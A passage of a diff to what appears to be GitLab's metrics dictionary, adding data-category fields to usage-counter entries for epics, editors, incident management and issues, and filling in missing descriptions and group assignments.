+13454,8 @@ Counts of MAU changing epic descriptions Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11418,6 +13468,8 @@ Counts of WAU changing epic descriptions Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11430,6 +13482,8 @@ Counts of MAU updating epic notes Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11442,6 +13496,8 @@ Counts of WAU updating epic notes Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11454,6 +13510,8 @@ Counts of MAU updating parent on epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11466,6 +13524,8 @@ Counts of WAU updating parent on epic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11478,6 +13538,8 @@ Counts of MAU changing epic titles Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11490,6 +13552,8 @@ Counts of WAU changing epic titles Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11502,6 +13566,8 @@ Counts of MAU manually updating fixed due date Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11514,6 +13580,8 @@ Counts of WAU manually updating fixed due date Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11526,6 +13594,8 @@ Counts of MAU manually updating fixed start date Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11538,6 +13608,8 @@ Counts of WAU manually updating fixed start date Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11550,6 +13622,8 @@ Counts of MAU checking epic task Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11562,6 +13636,8 @@ Counts of WAU checking epic task Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11574,6 +13650,8 @@ Counts of MAU unchecking epic task Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11586,6 +13664,8 @@ Counts of WAU unchecking epic task Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -11598,6 +13678,8 @@ Number of users editing a file from the single file editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11610,6 +13692,8 @@ Weekly number of users editing from the single file editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11622,6 +13706,8 @@ Count of monthly edits to a snippet Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11634,6 +13720,8 @@ Weekly number of users editing Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11646,6 +13734,8 @@ Number of user editing files using the Static Site Editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11658,6 +13748,8 @@ Weekly number of users editing using the Static Site Editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11670,6 +13762,8 @@ Number of users editing a file from the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11682,6 +13776,8 @@ Weekly number of users editing using the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11694,6 +13790,8 @@ Count of unique users per month who edited a file from the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -11706,369 +13804,431 @@ Weekly number of users editing a file using the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_alert_assigned_monthly` -Missing description +Count of unique users assigning an alert per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180533_incident_management_alert_assigned_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_alert_assigned_weekly` -Missing description +Count of unique users assigning an alert per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180532_incident_management_alert_assigned_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180532_incident_management_alert_assigned_weekly.yml) + +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_alert_status_changed_monthly` -Missing description +Count of unique users changing alert's status changes per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180530_incident_management_alert_status_changed_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_alert_status_changed_weekly` -Missing description +Count of unique users changing alert's status per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180528_incident_management_alert_status_changed_weekly.yml) -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180528_incident_management_alert_status_changed_weekly.yml) +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_alert_todo_monthly` -Missing description +Count of unique users adding alerts to the TODO list per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180537_incident_management_alert_todo_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_alert_todo_weekly` -Missing description +Count of unique users adding alerts to the TODO list per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180535_incident_management_alert_todo_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180535_incident_management_alert_todo_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_assigned_monthly` -Missing description +Count of users assigning incidents per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180552_incident_management_incident_assigned_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_assigned_weekly` -Missing description +Count of unique users assiging incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180550_incident_management_incident_assigned_weekly.yml) -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180550_incident_management_incident_assigned_weekly.yml) +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_change_confidential_monthly` -Missing description +Count of users changing incidents to confidential per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180618_incident_management_incident_change_confidential_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_change_confidential_weekly` -Missing description +Count of unique users changing incidents to confidential per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180616_incident_management_incident_change_confidential_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180616_incident_management_incident_change_confidential_weekly.yml) + +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_closed_monthly` -Missing description +Count of users closing incidents per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180548_incident_management_incident_closed_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_closed_weekly` -Missing description +Count of users closing incidents per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180546_incident_management_incident_closed_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180546_incident_management_incident_closed_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_comment_monthly` -Missing description +Count of unique users adding comments per month on incidents [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180559_incident_management_incident_comment_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_comment_weekly` -Missing description +Count of unique users adding comments on incidents per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180558_incident_management_incident_comment_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180558_incident_management_incident_comment_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_created_monthly` -Missing description +Count of unique users creating incidents per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180541_incident_management_incident_created_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_created_weekly` -Missing description +Count of unique users creating incidents per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180539_incident_management_incident_created_weekly.yml) -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180539_incident_management_incident_created_weekly.yml) +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_published_monthly` -Missing description +Count of unique users that published incidents per month -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180607_incident_management_incident_published_monthly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180607_incident_management_incident_published_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_published_weekly` -Missing description +Count of unique users that published incidents per week [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180605_incident_management_incident_published_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_relate_monthly` -Missing description +Count of unique users adding issues per month that are related to an incident [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180611_incident_management_incident_relate_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_relate_weekly` -Missing description +Count of unique users adding issues per that are related to an incident week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180609_incident_management_incident_relate_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180609_incident_management_incident_relate_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_reopened_monthly` -Missing description +Count of unique users reopening incidents per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180545_incident_management_incident_reopened_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_reopened_weekly` -Missing description +Count of unique users reopening incidents per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180543_incident_management_incident_reopened_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180543_incident_management_incident_reopened_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_todo_monthly` -Missing description +Count of unique users adding incidents to the TODO list per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180556_incident_management_incident_todo_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_todo_weekly` -Missing description +Count of unique users adding incidents to the TODO list per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180554_incident_management_incident_todo_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180554_incident_management_incident_todo_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_unrelate_monthly` -Missing description +Count of users removing issues that are related to an incident per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180614_incident_management_incident_unrelate_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_unrelate_weekly` -Missing description +Count of unique users removing issue that are related to an incident per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180612_incident_management_incident_unrelate_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180612_incident_management_incident_unrelate_weekly.yml) + +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_zoom_meeting_monthly` -Missing description +Count of users creating Zoom meetings about incidents per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180603_incident_management_incident_zoom_meeting_monthly.yml) -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180603_incident_management_incident_zoom_meeting_monthly.yml) +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_incident_zoom_meeting_weekly` -Missing description +Count of unique users creating Zoom meetings about incidents per week -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180601_incident_management_incident_zoom_meeting_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180601_incident_management_incident_zoom_meeting_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_total_unique_counts_monthly` -Missing description +Count of unique users performing events related with incidents per month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180622_incident_management_total_unique_counts_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Operational` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management.incident_management_total_unique_counts_weekly` -Missing description +Count of unique users performing events related to the incident management -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180620_incident_management_total_unique_counts_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180620_incident_management_total_unique_counts_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management_alerts.incident_management_alert_create_incident_monthly` @@ -12076,23 +14236,27 @@ Count of unique users per month to create an incident corresponding to an alert [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180625_incident_management_alert_create_incident_monthly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management_alerts.incident_management_alert_create_incident_weekly` Count of unique users per week to create an incident corresponding to an alert -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180623_incident_management_alert_create_incident_weekly.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180623_incident_management_alert_create_incident_weekly.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `redis_hll_counters.incident_management_oncall.i_incident_management_oncall_notification_sent_monthly` @@ -12102,6 +14266,8 @@ Count of unique users to receive a notification while on-call Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12114,6 +14280,8 @@ Count of unique users to receive a notification while on-call Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12126,6 +14294,8 @@ Count of MAU adding an issue to an epic Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12138,6 +14308,8 @@ Count of WAU adding an issue to an epic Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12150,6 +14322,8 @@ Count of MAU changing issue assignees Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12162,6 +14336,8 @@ Count of WAU changing issue assignees Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12174,6 +14350,8 @@ Count of MAU changing the epic on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12186,6 +14364,8 @@ Count of WAU changing the epic on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12198,6 +14378,8 @@ Count of MAU cloning an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12210,6 +14392,8 @@ Count of WAU cloning an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12222,6 +14406,8 @@ Count of MAU closing an issue Group: `group::project management` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12234,6 +14420,8 @@ Count of WAU closing an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12246,6 +14434,8 @@ Count of MAU commenting on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12258,6 +14448,8 @@ Count of WAU commenting on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12270,6 +14462,8 @@ Count of MAU editing a comment on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12282,6 +14476,8 @@ Count of WAU editing a comment on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12294,6 +14490,8 @@ Count of MAU deleting a comment from an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12306,6 +14504,8 @@ Count of WAU deleting a comment from an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12318,6 +14518,8 @@ Count of MAU creating new issues Group: `group::project management` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12330,6 +14532,8 @@ Count of WAU creating issues Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12342,6 +14546,8 @@ Count of MAU referencing an issue from somewhere else Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12354,6 +14560,8 @@ Count of WAU referencing an issue from somewhere else Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12366,6 +14574,8 @@ Count of MAU editing an issue description Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12378,6 +14588,8 @@ Count of WAU editing an issue description Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12390,6 +14602,8 @@ Count of MAU adding a design to an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12402,6 +14616,8 @@ Count of WAU adding a design to an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12414,6 +14630,8 @@ Count of MAU modifying a design on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12426,6 +14644,8 @@ Count of WAU modifying a design on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12438,6 +14658,8 @@ Count of MAU removing a design from an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12450,6 +14672,8 @@ Count of WAU removing a design from an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12462,6 +14686,8 @@ Count of MAU changing an issue due date Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12474,6 +14700,8 @@ Count of WAU changing an issue due date Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12486,6 +14714,8 @@ Count of MAU changing the health status on an issue Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -12498,6 +14728,8 @@ Count of WAU changing the health status on an issue Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -12510,6 +14742,8 @@ Count of MAU changing an issue's iteration Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12522,6 +14756,8 @@ Count of WAU changing an issue's iteration Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12534,6 +14770,8 @@ Count of MAU changing an issue's label Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12546,6 +14784,8 @@ Count of WAU changing an issue's label Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12558,6 +14798,8 @@ Count of MAU locking an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12570,6 +14812,8 @@ Count of WAU locking an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12582,6 +14826,8 @@ Count of MAU making an issue confidential Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12594,6 +14840,8 @@ Count of WAU making an issue confidential Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12606,6 +14854,8 @@ Count of MAU making an issue not confidential Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12618,6 +14868,8 @@ Count of WAU making an issue not confidential Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12630,6 +14882,8 @@ Count of MAU marking an issue as a duplicate Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12642,6 +14896,8 @@ Count of WAU marking an issue as a duplicate Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12654,6 +14910,8 @@ Count of MAU changing an issue's milestone Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12666,6 +14924,8 @@ Count of WAU changing an issue's milestone Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12678,6 +14938,8 @@ Count of MAU moving an issue to another project Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12690,6 +14952,8 @@ Count of WAU moving an issue to another project Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12702,6 +14966,8 @@ Count of MAU relating an issue to another issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12714,6 +14980,8 @@ Count of WAU relating an issue to another issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12726,6 +14994,8 @@ Count of MAU removing an issue from an epic Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12738,6 +15008,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -12750,6 +15022,8 @@ Count of MAU re-opening a closed issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12762,6 +15036,8 @@ Count of WAU re-opening a closed issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12774,6 +15050,8 @@ Count of MAU changing an issue time estimate Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12786,6 +15064,8 @@ Count of WAU changing an issue time estimate Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12798,6 +15078,8 @@ Count of MAU recording time spent on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12810,6 +15092,8 @@ Count of WAU recording time spent on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12822,6 +15106,8 @@ Count of MAU editing an issue title Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12834,6 +15120,8 @@ Count of WAU editing an issue title Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12846,6 +15134,8 @@ Count of MAU unlocking an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12858,6 +15148,8 @@ Count of WAU unlocking an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12870,6 +15162,8 @@ Count of MAU unrelating an issue to another issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12882,6 +15176,8 @@ Count of WAU unrelating an issue to another issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12894,6 +15190,8 @@ Count of MAU 